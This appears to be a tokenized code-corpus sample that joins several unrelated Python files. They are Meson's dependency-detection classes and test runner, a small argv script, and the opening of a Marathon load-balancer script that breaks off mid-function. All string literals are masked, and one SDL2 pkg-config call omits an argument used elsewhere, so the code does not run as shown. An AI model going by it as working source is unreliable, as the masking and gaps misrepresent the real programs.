            self.cargs.append('<STR_LIT>' + mincdir)
            libfile = os.path.\
join(libdir, '<STR_LIT>' + module + '<STR_LIT>')
            if not os.path.isfile(libfile):
                # Fall back to the bin dir (Windows DLL layout).
                libfile = os.path.join(bindir, '<STR_LIT>' + module + '<STR_LIT>')
            self.largs.append(libfile)
        self.is_found = True

    def framework_detect(self, qvars, modules, kwargs):
        # OS X: Qt modules are frameworks living in the library dir.
        libdir = qvars['<STR_LIT>']
        for m in modules:
            fname = '<STR_LIT>' + m
            fwdep = ExtraFrameworkDependency(fname, kwargs.get('<STR_LIT>', True), libdir)
            self.cargs.append('<STR_LIT>' + libdir)
            if fwdep.found():
                self.is_found = True
                self.cargs += fwdep.get_compile_args()
                self.largs += fwdep.get_link_args()

    def get_version(self):
        return self.version

    def get_compile_args(self):
        return self.cargs

    def get_sources(self):
        return []

    def get_link_args(self):
        return self.largs

    def found(self):
        return self.is_found

    def get_exe_args(self):
        return ['<STR_LIT>']


class Qt4Dependency(Dependency):
    """Qt 4 found through per-module pkg-config files."""

    def __init__(self, environment, kwargs):
        Dependency.__init__(self)
        self.name = '<STR_LIT>'
        self.root = '<STR_LIT>'
        self.modules = []
        mods = kwargs.get('<STR_LIT>', [])
        if isinstance(mods, str):
            mods = [mods]
        for module in mods:
            self.modules.append(PkgConfigDependency('<STR_LIT>' + module, environment, kwargs))
        if len(self.modules) == 0:
            raise DependencyException('<STR_LIT>')

    def get_version(self):
        return self.modules[0].get_version()

    def get_compile_args(self):
        args = []
        for m in self.modules:
            args += m.get_compile_args()
        return args

    def get_sources(self):
        return []

    def get_link_args(self):
        args = []
        for module in self.modules:
            args += module.get_link_args()
        return args

    def found(self):
        # Found only if every requested module was found.
        for i in self.modules:
            if not i.found():
                return False
        return True


class GnuStepDependency(Dependency):
    """GNUstep detected through the gnustep-config helper."""

    def __init__(self, environment, kwargs):
        Dependency.__init__(self)
        self.modules = kwargs.get('<STR_LIT>', [])
        self.detect()

    def detect(self):
        confprog = '<STR_LIT>'
        try:
            gp = subprocess.Popen([confprog, '<STR_LIT>'],
                                  stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            gp.communicate()
        except FileNotFoundError:
            self.args = None
            mlog.log('<STR_LIT>', mlog.red('<STR_LIT>'), '<STR_LIT>')
            return
        if gp.returncode != 0:
            self.args = None
            mlog.log('<STR_LIT>', mlog.red('<STR_LIT>'))
            return
        # Which library flag set to request depends on the modules asked for.
        if '<STR_LIT>' in self.modules:
            arg = '<STR_LIT>'
        else:
            arg = '<STR_LIT>'
        fp = subprocess.Popen([confprog, '<STR_LIT>'],
                              stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        (flagtxt, flagerr) = fp.communicate()
        flagtxt = flagtxt.decode()
        flagerr = flagerr.decode()
        if fp.returncode != 0:
            raise DependencyException('<STR_LIT>' % (flagtxt, flagerr))
        args = flagtxt.split()
        # NOTE(review): 'filter_arsg' looks like a typo for 'filter_args';
        # the name is kept unchanged because it is part of this class's
        # callable interface.
        self.args = self.filter_arsg(args)
        fp = subprocess.Popen([confprog, arg],
                              stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        (libtxt, liberr) = fp.communicate()
        libtxt = libtxt.decode()
        liberr = liberr.decode()
        if fp.returncode != 0:
            raise DependencyException('<STR_LIT>' % (libtxt, liberr))
        self.libs = self.weird_filter(libtxt.split())
        mlog.log('<STR_LIT>', mlog.
green ( '<STR_LIT>' ) ) <EOL> def weird_filter ( self , elems ) : <EOL> """<STR_LIT>""" <EOL> return [ e for e in elems if e . startswith ( '<STR_LIT:->' ) ] <EOL> def filter_arsg ( self , args ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> for f in args : <EOL> if f . startswith ( '<STR_LIT>' ) or f . startswith ( '<STR_LIT>' ) or f . startswith ( '<STR_LIT>' ) or f == '<STR_LIT>' or ( f . startswith ( '<STR_LIT>' ) and not f == '<STR_LIT>' ) : <EOL> result . append ( f ) <EOL> return result <EOL> def found ( self ) : <EOL> return self . args is not None <EOL> def get_compile_args ( self ) : <EOL> if self . args is None : <EOL> return [ ] <EOL> return self . args <EOL> def get_link_args ( self ) : <EOL> return self . libs <EOL> class AppleFrameworks ( Dependency ) : <EOL> def __init__ ( self , environment , kwargs ) : <EOL> Dependency . __init__ ( self ) <EOL> modules = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> if isinstance ( modules , str ) : <EOL> modules = [ modules ] <EOL> if len ( modules ) == <NUM_LIT:0> : <EOL> raise DependencyException ( "<STR_LIT>" ) <EOL> self . frameworks = modules <EOL> def get_link_args ( self ) : <EOL> args = [ ] <EOL> for f in self . frameworks : <EOL> args . append ( '<STR_LIT>' ) <EOL> args . append ( f ) <EOL> return args <EOL> def found ( self ) : <EOL> return mesonlib . is_osx ( ) <EOL> class GLDependency ( Dependency ) : <EOL> def __init__ ( self , environment , kwargs ) : <EOL> Dependency . __init__ ( self ) <EOL> self . is_found = False <EOL> self . cargs = [ ] <EOL> self . linkargs = [ ] <EOL> try : <EOL> pcdep = PkgConfigDependency ( '<STR_LIT>' , environment , kwargs ) <EOL> if pcdep . found ( ) : <EOL> self . is_found = True <EOL> self . cargs = pcdep . get_compile_args ( ) <EOL> self . linkargs = pcdep . get_link_args ( ) <EOL> return <EOL> except Exception : <EOL> pass <EOL> if mesonlib . is_osx ( ) : <EOL> self . is_found = True <EOL> self . linkargs = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> return <EOL> if mesonlib . 
is_windows ( ) : <EOL> self . is_found = True <EOL> self . linkargs = [ '<STR_LIT>' ] <EOL> return <EOL> def get_link_args ( self ) : <EOL> return self . linkargs <EOL> class SDL2Dependency ( Dependency ) : <EOL> def __init__ ( self , environment , kwargs ) : <EOL> Dependency . __init__ ( self ) <EOL> self . is_found = False <EOL> self . cargs = [ ] <EOL> self . linkargs = [ ] <EOL> sdlconf = shutil . which ( '<STR_LIT>' ) <EOL> if sdlconf : <EOL> pc = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . DEVNULL ) <EOL> ( stdo , _ ) = pc . communicate ( ) <EOL> self . cargs = stdo . decode ( ) . strip ( ) . split ( ) <EOL> pc = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . DEVNULL ) <EOL> ( stdo , _ ) = pc . communicate ( ) <EOL> self . linkargs = stdo . decode ( ) . strip ( ) . split ( ) <EOL> self . is_found = True <EOL> mlog . log ( '<STR_LIT>' , mlog . bold ( '<STR_LIT>' ) , '<STR_LIT>' , mlog . green ( '<STR_LIT>' ) , '<STR_LIT>' % sdlconf ) <EOL> return <EOL> try : <EOL> pcdep = PkgConfigDependency ( '<STR_LIT>' , kwargs ) <EOL> if pcdep . found ( ) : <EOL> self . is_found = True <EOL> self . cargs = pcdep . get_compile_args ( ) <EOL> self . linkargs = pcdep . get_link_args ( ) <EOL> return <EOL> except Exception : <EOL> pass <EOL> if mesonlib . is_osx ( ) : <EOL> fwdep = ExtraFrameworkDependency ( '<STR_LIT>' , kwargs . get ( '<STR_LIT>' , True ) ) <EOL> if fwdep . found ( ) : <EOL> self . is_found = True <EOL> self . cargs = fwdep . get_compile_args ( ) <EOL> self . linkargs = fwdep . get_link_args ( ) <EOL> return <EOL> mlog . log ( '<STR_LIT>' , mlog . bold ( '<STR_LIT>' ) , '<STR_LIT>' , mlog . red ( '<STR_LIT>' ) ) <EOL> def get_compile_args ( self ) : <EOL> return self . cargs <EOL> def get_link_args ( self ) : <EOL> return self . linkargs <EOL> def found ( self ) : <EOL> return self . 
is_found


class ExtraFrameworkDependency(Dependency):
    """An OS X framework found by scanning framework directories."""

    def __init__(self, name, required, path=None):
        Dependency.__init__(self)
        self.name = None
        self.detect(name, path)
        if self.found():
            mlog.log('<STR_LIT>', mlog.bold(name), '<STR_LIT>', mlog.green('<STR_LIT>'),
                     os.path.join(self.path, self.name))
        else:
            mlog.log('<STR_LIT>', name, '<STR_LIT>', mlog.red('<STR_LIT>'))

    def detect(self, name, path):
        # Case-insensitive match on the framework directory basename.
        lname = name.lower()
        if path is None:
            paths = ['<STR_LIT>']
        else:
            paths = [path]
        for p in paths:
            for d in os.listdir(p):
                fullpath = os.path.join(p, d)
                if lname != d.split('<STR_LIT:.>')[0].lower():
                    continue
                if not stat.S_ISDIR(os.stat(fullpath).st_mode):
                    continue
                self.path = p
                self.name = d
                return

    def get_compile_args(self):
        if self.found():
            return ['<STR_LIT>' + os.path.join(self.path, self.name, '<STR_LIT>')]
        return []

    def get_link_args(self):
        if self.found():
            return ['<STR_LIT>' + self.path, '<STR_LIT>', self.name.split('<STR_LIT:.>')[0]]
        return []

    def found(self):
        return self.name is not None


class ThreadDependency(Dependency):
    """Thread support; always reported found (flags come from elsewhere)."""

    def __init__(self, environment, kwargs):
        super().__init__()
        self.name = '<STR_LIT>'
        self.is_found = True
        mlog.log('<STR_LIT>', mlog.bold(self.name), '<STR_LIT>', mlog.green('<STR_LIT>'))

    def need_threads(self):
        return True


class Python3Dependency(Dependency):
    """Embeddable Python 3 via pkg-config, sysconfig, or OS X framework."""

    def __init__(self, environment, kwargs):
        super().__init__()
        self.name = '<STR_LIT>'
        self.is_found = False
        try:
            pkgdep = PkgConfigDependency('<STR_LIT>', environment, kwargs)
            if pkgdep.found():
                self.cargs = pkgdep.cargs
                self.libs = pkgdep.libs
                self.is_found = True
                return
        except Exception:
            pass
        if not self.is_found:
            if mesonlib.is_windows():
                # Derive flags from the running interpreter's sysconfig.
                inc = sysconfig.get_path('<STR_LIT>')
                platinc = sysconfig.get_path('<STR_LIT>')
                self.cargs = ['<STR_LIT>' + inc]
                if inc != platinc:
                    self.cargs.append('<STR_LIT>' + platinc)
                basedir = sysconfig.get_config_var('<STR_LIT>')
                vernum = sysconfig.get_config_var('<STR_LIT>')
                self.libs = ['<STR_LIT>'.format(basedir),
                             '<STR_LIT>'.format(vernum)]
                self.is_found = True
            elif mesonlib.is_osx():
                fw = ExtraFrameworkDependency('<STR_LIT>', False)
                if fw.found():
                    self.cargs = fw.get_compile_args()
                    self.libs = fw.get_link_args()
                    self.is_found = True
        if self.is_found:
            mlog.log('<STR_LIT>', mlog.bold(self.name), '<STR_LIT>', mlog.green('<STR_LIT>'))
        else:
            mlog.log('<STR_LIT>', mlog.bold(self.name), '<STR_LIT>', mlog.red('<STR_LIT>'))

    def get_compile_args(self):
        return self.cargs

    def get_link_args(self):
        return self.libs


def get_dep_identifier(name, kwargs):
    # Cache key: name plus modules plus the kwargs that change the result.
    elements = [name]
    modlist = kwargs.get('<STR_LIT>', [])
    if isinstance(modlist, str):
        modlist = [modlist]
    for module in modlist:
        elements.append(module)
    return '<STR_LIT:/>'.join(elements) + '<STR_LIT>' + str(kwargs.get('<STR_LIT>', False)) + '<STR_LIT>' + str(kwargs.get('<STR_LIT>', False))


def find_external_dependency(name, environment, kwargs):
    """Look up a dependency by name, preferring a specialised detector,
    then pkg-config, then (on OS X) a framework."""
    required = kwargs.get('<STR_LIT>', True)
    if not isinstance(required, bool):
        raise DependencyException('<STR_LIT>')
    lname = name.lower()
    if lname in packages:
        dep = packages[lname](environment, kwargs)
        if required and not dep.found():
            raise DependencyException('<STR_LIT>' % name)
        return dep
    pkg_exc = None
    pkgdep = None
    try:
        pkgdep = PkgConfigDependency(name, environment, kwargs)
        if pkgdep.found():
            return pkgdep
    except Exception as e:
        # Remember the failure; re-raised only if no fallback applies.
        pkg_exc = e
    if mesonlib.is_osx():
        fwdep = ExtraFrameworkDependency(name, required)
        if required and not fwdep.found():
            raise DependencyException('<STR_LIT>' % name)
        return fwdep
    if pkg_exc is not None:
        raise pkg_exc
    mlog.log('<STR_LIT>', mlog.bold(name), '<STR_LIT>', mlog.red('<STR_LIT>'))
    return pkgdep


# Registry mapping lowercase dependency names to their detector classes.
packages = {'<STR_LIT>': BoostDependency,
            '<STR_LIT>': GTestDependency,
            '<STR_LIT>': GMockDependency,
            '<STR_LIT>': Qt5Dependency,
            '<STR_LIT>': Qt4Dependency,
            '<STR_LIT>': GnuStepDependency,
            '<STR_LIT>': AppleFrameworks,
            '<STR_LIT>': WxDependency,
            '<STR_LIT>': SDL2Dependency,
            '<STR_LIT>': GLDependency,
            '<STR_LIT>': ThreadDependency,
            '<STR_LIT>': Python3Dependency,
            }
<s> import mesonbuild <EOL> import sys , os , subprocess , time , datetime , pickle , multiprocessing , json <EOL> import concurrent . futures as conc <EOL> import argparse <EOL> import platform <EOL> import signal <EOL> def is_windows ( ) : <EOL> platname = platform . system ( ) . lower ( ) <EOL> return platname == '<STR_LIT>' or '<STR_LIT>' in platname <EOL> collected_logs = [ ] <EOL> error_count = <NUM_LIT:0> <EOL> options = None <EOL> parser = argparse . ArgumentParser ( ) <EOL> parser . add_argument ( '<STR_LIT>' , default = None , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , default = None , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , default = None , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , default = True , dest = '<STR_LIT>' , action = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , default = False , action = '<STR_LIT:store_true>' , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT:args>' , nargs = '<STR_LIT:+>' ) <EOL> class TestRun ( ) : <EOL> def __init__ ( self , res , returncode , should_fail , duration , stdo , stde , cmd ) : <EOL> self . res = res <EOL> self . returncode = returncode <EOL> self . duration = duration <EOL> self . stdo = stdo <EOL> self . stde = stde <EOL> self . cmd = cmd <EOL> self . should_fail = should_fail <EOL> def get_log ( self ) : <EOL> res = '<STR_LIT>' <EOL> if self . cmd is None : <EOL> res += '<STR_LIT>' <EOL> else : <EOL> res += '<STR_LIT:U+0020>' . join ( self . cmd ) + '<STR_LIT:\n>' <EOL> if self . stdo : <EOL> res += '<STR_LIT>' <EOL> res += self . stdo <EOL> if self . stde : <EOL> if res [ - <NUM_LIT:1> : ] != '<STR_LIT:\n>' : <EOL> res += '<STR_LIT:\n>' <EOL> res += '<STR_LIT>' <EOL> res += self . 
stde <EOL> if res [ - <NUM_LIT:1> : ] != '<STR_LIT:\n>' : <EOL> res += '<STR_LIT:\n>' <EOL> res += '<STR_LIT>' <EOL> return res <EOL> def decode ( stream ) : <EOL> try : <EOL> return stream . decode ( '<STR_LIT:utf-8>' ) <EOL> except UnicodeDecodeError : <EOL> return stream . decode ( '<STR_LIT>' , errors = '<STR_LIT:ignore>' ) <EOL> def write_json_log ( jsonlogfile , test_name , result ) : <EOL> jresult = { '<STR_LIT:name>' : test_name , <EOL> '<STR_LIT>' : result . stdo , <EOL> '<STR_LIT:result>' : result . res , <EOL> '<STR_LIT>' : result . duration , <EOL> '<STR_LIT>' : result . returncode , <EOL> '<STR_LIT>' : result . cmd } <EOL> if result . stde : <EOL> jresult [ '<STR_LIT>' ] = result . stde <EOL> jsonlogfile . write ( json . dumps ( jresult ) + '<STR_LIT:\n>' ) <EOL> def run_with_mono ( fname ) : <EOL> if fname . endswith ( '<STR_LIT>' ) and not is_windows ( ) : <EOL> return True <EOL> return False <EOL> def run_single_test ( wrap , test ) : <EOL> global options <EOL> if test . fname [ <NUM_LIT:0> ] . endswith ( '<STR_LIT>' ) : <EOL> cmd = [ '<STR_LIT>' , '<STR_LIT>' ] + test . fname <EOL> elif not test . is_cross and run_with_mono ( test . fname [ <NUM_LIT:0> ] ) : <EOL> cmd = [ '<STR_LIT>' ] + test . fname <EOL> else : <EOL> if test . is_cross : <EOL> if test . exe_runner is None : <EOL> cmd = None <EOL> else : <EOL> cmd = [ test . exe_runner ] + test . fname <EOL> else : <EOL> cmd = test . fname <EOL> if len ( wrap ) > <NUM_LIT:0> and '<STR_LIT>' in wrap [ <NUM_LIT:0> ] : <EOL> wrap += test . valgrind_args <EOL> if cmd is None : <EOL> res = '<STR_LIT>' <EOL> duration = <NUM_LIT:0.0> <EOL> stdo = '<STR_LIT>' <EOL> stde = None <EOL> returncode = - <NUM_LIT:1> <EOL> else : <EOL> cmd = wrap + cmd + test . cmd_args <EOL> starttime = time . time ( ) <EOL> child_env = os . environ . copy ( ) <EOL> child_env . update ( test . env ) <EOL> if len ( test . extra_paths ) > <NUM_LIT:0> : <EOL> child_env [ '<STR_LIT>' ] = child_env [ '<STR_LIT>' ] + '<STR_LIT:;>' . 
join ( [ '<STR_LIT>' ] + test . extra_paths ) <EOL> if is_windows ( ) : <EOL> setsid = None <EOL> else : <EOL> setsid = os . setsid <EOL> p = subprocess . Popen ( cmd , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE if options and options . split else subprocess . STDOUT , <EOL> env = child_env , <EOL> cwd = test . workdir , <EOL> preexec_fn = setsid ) <EOL> timed_out = False <EOL> try : <EOL> ( stdo , stde ) = p . communicate ( timeout = test . timeout ) <EOL> except subprocess . TimeoutExpired : <EOL> timed_out = True <EOL> if is_windows ( ) : <EOL> subprocess . call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , str ( p . pid ) ] ) <EOL> else : <EOL> os . killpg ( os . getpgid ( p . pid ) , signal . SIGKILL ) <EOL> ( stdo , stde ) = p . communicate ( ) <EOL> endtime = time . time ( ) <EOL> duration = endtime - starttime <EOL> stdo = decode ( stdo ) <EOL> if stde : <EOL> stde = decode ( stde ) <EOL> if timed_out : <EOL> res = '<STR_LIT>' <EOL> elif ( not test . should_fail and p . returncode == <NUM_LIT:0> ) or ( test . should_fail and p . returncode != <NUM_LIT:0> ) : <EOL> res = '<STR_LIT:OK>' <EOL> else : <EOL> res = '<STR_LIT>' <EOL> returncode = p . returncode <EOL> return TestRun ( res , returncode , test . should_fail , duration , stdo , stde , cmd ) <EOL> def print_stats ( numlen , tests , name , result , i , logfile , jsonlogfile ) : <EOL> global collected_logs , error_count , options <EOL> startpad = '<STR_LIT:U+0020>' * ( numlen - len ( '<STR_LIT>' % ( i + <NUM_LIT:1> ) ) ) <EOL> num = '<STR_LIT>' % ( startpad , i + <NUM_LIT:1> , len ( tests ) ) <EOL> padding1 = '<STR_LIT:U+0020>' * ( <NUM_LIT> - len ( name ) ) <EOL> padding2 = '<STR_LIT:U+0020>' * ( <NUM_LIT:8> - len ( result . res ) ) <EOL> result_str = '<STR_LIT>' % ( num , name , padding1 , result . res , padding2 , result . duration ) <EOL> print ( result_str ) <EOL> result_str += "<STR_LIT>" + result . get_log ( ) <EOL> if ( result . 
returncode != <NUM_LIT:0> ) != result . should_fail : <EOL> error_count += <NUM_LIT:1> <EOL> if options . print_errorlogs : <EOL> collected_logs . append ( result_str ) <EOL> logfile . write ( result_str ) <EOL> write_json_log ( jsonlogfile , name , result ) <EOL> def drain_futures ( futures ) : <EOL> for i in futures : <EOL> ( result , numlen , tests , name , i , logfile , jsonlogfile ) = i <EOL> print_stats ( numlen , tests , name , result . result ( ) , i , logfile , jsonlogfile ) <EOL> def filter_tests ( suite , tests ) : <EOL> if suite is None : <EOL> return tests <EOL> return [ x for x in tests if suite in x . suite ] <EOL> def run_tests ( datafilename ) : <EOL> global options <EOL> logfile_base = '<STR_LIT>' <EOL> if options . wrapper is None : <EOL> wrap = [ ] <EOL> logfilename = logfile_base + '<STR_LIT>' <EOL> jsonlogfilename = logfile_base + '<STR_LIT>' <EOL> else : <EOL> wrap = [ options . wrapper ] <EOL> logfilename = logfile_base + '<STR_LIT:->' + options . wrapper . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) + '<STR_LIT>' <EOL> jsonlogfilename = logfile_base + '<STR_LIT:->' + options . wrapper . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) + '<STR_LIT>' <EOL> logfile = open ( logfilename , '<STR_LIT:w>' ) <EOL> jsonlogfile = open ( jsonlogfilename , '<STR_LIT:w>' ) <EOL> logfile . write ( '<STR_LIT>' % datetime . datetime . now ( ) . isoformat ( ) ) <EOL> tests = pickle . load ( open ( datafilename , '<STR_LIT:rb>' ) ) <EOL> if len ( tests ) == <NUM_LIT:0> : <EOL> print ( '<STR_LIT>' ) <EOL> return <EOL> numlen = len ( '<STR_LIT>' % len ( tests ) ) <EOL> varname = '<STR_LIT>' <EOL> if varname in os . environ : <EOL> try : <EOL> num_workers = int ( os . environ [ varname ] ) <EOL> except ValueError : <EOL> print ( '<STR_LIT>' % varname ) <EOL> num_workers = <NUM_LIT:1> <EOL> else : <EOL> num_workers = multiprocessing . cpu_count ( ) <EOL> executor = conc . 
ThreadPoolExecutor ( max_workers = num_workers ) <EOL> futures = [ ] <EOL> filtered_tests = filter_tests ( options . suite , tests ) <EOL> for i , test in enumerate ( filtered_tests ) : <EOL> if test . suite [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> visible_name = test . name <EOL> else : <EOL> if options . suite is not None : <EOL> visible_name = options . suite + '<STR_LIT>' + test . name <EOL> else : <EOL> visible_name = test . suite [ <NUM_LIT:0> ] + '<STR_LIT>' + test . name <EOL> if not test . is_parallel : <EOL> drain_futures ( futures ) <EOL> futures = [ ] <EOL> res = run_single_test ( wrap , test ) <EOL> print_stats ( numlen , filtered_tests , visible_name , res , i , logfile , jsonlogfile ) <EOL> else : <EOL> f = executor . submit ( run_single_test , wrap , test ) <EOL> futures . append ( ( f , numlen , filtered_tests , visible_name , i , logfile , jsonlogfile ) ) <EOL> drain_futures ( futures ) <EOL> return logfilename <EOL> def run ( args ) : <EOL> global collected_logs , error_count , options <EOL> collected_logs = [ ] <EOL> error_count = <NUM_LIT:0> <EOL> options = parser . parse_args ( args ) <EOL> if len ( options . args ) != <NUM_LIT:1> : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' % sys . argv [ <NUM_LIT:0> ] ) <EOL> if options . wd is not None : <EOL> os . chdir ( options . wd ) <EOL> datafile = options . args [ <NUM_LIT:0> ] <EOL> logfilename = run_tests ( datafile ) <EOL> if len ( collected_logs ) > <NUM_LIT:0> : <EOL> if len ( collected_logs ) > <NUM_LIT:10> : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' ) <EOL> for log in collected_logs [ : <NUM_LIT:10> ] : <EOL> lines = log . splitlines ( ) <EOL> if len ( lines ) > <NUM_LIT:100> : <EOL> print ( lines [ <NUM_LIT:0> ] ) <EOL> print ( '<STR_LIT>' ) <EOL> lines = lines [ - <NUM_LIT> : ] <EOL> for line in lines : <EOL> print ( line ) <EOL> print ( '<STR_LIT>' % logfilename ) <EOL> return error_count <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . 
exit ( run ( sys . argv [ <NUM_LIT:1> : ] ) ) </s>
<s> import sys <EOL> if sys . argv [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> print ( '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> print ( '<STR_LIT>' , sys . argv [ <NUM_LIT:1> ] ) <EOL> sys . exit ( <NUM_LIT:1> ) </s>
<s> """<STR_LIT>""" <EOL> from operator import attrgetter <EOL> from shutil import move <EOL> from tempfile import mkstemp <EOL> from wsgiref . simple_server import make_server <EOL> from six . moves . urllib import parse <EOL> from itertools import cycle <EOL> from common import * <EOL> from config import * <EOL> from lrucache import * <EOL> from utils import * <EOL> import argparse <EOL> import json <EOL> import logging <EOL> import os <EOL> import os . path <EOL> import stat <EOL> import re <EOL> import requests <EOL> import shlex <EOL> import subprocess <EOL> import sys <EOL> import time <EOL> import dateutil . parser <EOL> import threading <EOL> import traceback <EOL> import random <EOL> import hashlib <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> SERVICE_PORT_ASSIGNER = ServicePortAssigner ( ) <EOL> class MarathonBackend ( object ) : <EOL> def __init__ ( self , host , ip , port , draining ) : <EOL> self . host = host <EOL> """<STR_LIT>""" <EOL> self . ip = ip <EOL> """<STR_LIT>""" <EOL> self . port = port <EOL> """<STR_LIT>""" <EOL> self . draining = draining <EOL> """<STR_LIT>""" <EOL> def __hash__ ( self ) : <EOL> return hash ( ( self . host , self . port ) ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . host , self . ip , self . port ) <EOL> class MarathonService ( object ) : <EOL> def __init__ ( self , appId , servicePort , healthCheck ) : <EOL> self . appId = appId <EOL> self . servicePort = servicePort <EOL> self . backends = set ( ) <EOL> self . hostname = None <EOL> self . proxypath = None <EOL> self . revproxypath = None <EOL> self . redirpath = None <EOL> self . haproxy_groups = frozenset ( ) <EOL> self . path = None <EOL> self . authRealm = None <EOL> self . authUser = None <EOL> self . authPasswd = None <EOL> self . sticky = False <EOL> self . redirectHttpToHttps = False <EOL> self . useHsts = False <EOL> self . sslCert = None <EOL> self . bindOptions = None <EOL> self . bindAddr = '<STR_LIT:*>' <EOL> self . 
groups = frozenset ( ) <EOL> self . mode = '<STR_LIT>' <EOL> self . balance = '<STR_LIT>' <EOL> self . healthCheck = healthCheck <EOL> self . labels = { } <EOL> self . backend_weight = <NUM_LIT:0> <EOL> if healthCheck : <EOL> if healthCheck [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> self . mode = '<STR_LIT:http>' <EOL> def add_backend ( self , host , ip , port , draining ) : <EOL> self . backends . add ( MarathonBackend ( host , ip , port , draining ) ) <EOL> def __hash__ ( self ) : <EOL> return hash ( self . servicePort ) <EOL> def __eq__ ( self , other ) : <EOL> return self . servicePort == other . servicePort <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . appId , self . servicePort ) <EOL> class MarathonApp ( object ) : <EOL> def __init__ ( self , marathon , appId , app ) : <EOL> self . app = app <EOL> self . groups = frozenset ( ) <EOL> self . appId = appId <EOL> self . services = dict ( ) <EOL> def __hash__ ( self ) : <EOL> return hash ( self . appId ) <EOL> def __eq__ ( self , other ) : <EOL> return self . appId == other . appId <EOL> class Marathon ( object ) : <EOL> def __init__ ( self , hosts , health_check , auth ) : <EOL> self . __hosts = hosts <EOL> self . __health_check = health_check <EOL> self . __auth = auth <EOL> self . __cycle_hosts = cycle ( self . __hosts ) <EOL> def api_req_raw ( self , method , path , auth , body = None , ** kwargs ) : <EOL> for host in self . __hosts : <EOL> path_str = os . path . join ( host , '<STR_LIT>' ) <EOL> for path_elem in path : <EOL> path_str = path_str + "<STR_LIT:/>" + path_elem <EOL> response = requests . request ( <EOL> method , <EOL> path_str , <EOL> auth = auth , <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT:application/json>' , <EOL> '<STR_LIT:Content-Type>' : '<STR_LIT:application/json>' <EOL> } , <EOL> ** kwargs <EOL> ) <EOL> logger . debug ( "<STR_LIT>" , method , response . url ) <EOL> if response . status_code == <NUM_LIT:200> : <EOL> break <EOL> if '<STR_LIT:message>' in response . 
json ( ) : <EOL> response . reason = "<STR_LIT>" % ( <EOL> response . reason , <EOL> response . json ( ) [ '<STR_LIT:message>' ] ) <EOL> response . raise_for_status ( ) <EOL> return response <EOL> def api_req ( self , method , path , ** kwargs ) : <EOL> return self . api_req_raw ( method , path , self . __auth , ** kwargs ) . json ( ) <EOL> def create ( self , app_json ) : <EOL> return self . api_req ( '<STR_LIT:POST>' , [ '<STR_LIT>' ] , app_json ) <EOL> def get_app ( self , appid ) : <EOL> logger . info ( '<STR_LIT>' , appid ) <EOL> return self . api_req ( '<STR_LIT:GET>' , [ '<STR_LIT>' , appid ] ) [ "<STR_LIT>" ] <EOL> def list ( self ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return self . api_req ( '<STR_LIT:GET>' , [ '<STR_LIT>' ] , <EOL> params = { '<STR_LIT>' : '<STR_LIT>' } ) [ "<STR_LIT>" ] <EOL> def health_check ( self ) : <EOL> return self . __health_check <EOL> def tasks ( self ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return self . api_req ( '<STR_LIT:GET>' , [ '<STR_LIT>' ] ) [ "<STR_LIT>" ] <EOL> def add_subscriber ( self , callbackUrl ) : <EOL> return self . api_req ( <EOL> '<STR_LIT:POST>' , <EOL> [ '<STR_LIT>' ] , <EOL> params = { '<STR_LIT>' : callbackUrl } ) <EOL> def remove_subscriber ( self , callbackUrl ) : <EOL> return self . api_req ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> params = { '<STR_LIT>' : callbackUrl } ) <EOL> def get_event_stream ( self ) : <EOL> url = self . host + "<STR_LIT>" <EOL> logger . info ( <EOL> "<STR_LIT>" . format ( url ) ) <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> resp = requests . get ( url , stream = True , <EOL> headers = headers , auth = self . __auth ) <EOL> class Event ( object ) : <EOL> def __init__ ( self , data ) : <EOL> self . data = data <EOL> for line in resp . iter_lines ( ) : <EOL> if line . strip ( ) != '<STR_LIT>' : <EOL> for real_event_data in re . split ( r'<STR_LIT:\r\n>' , <EOL> line . 
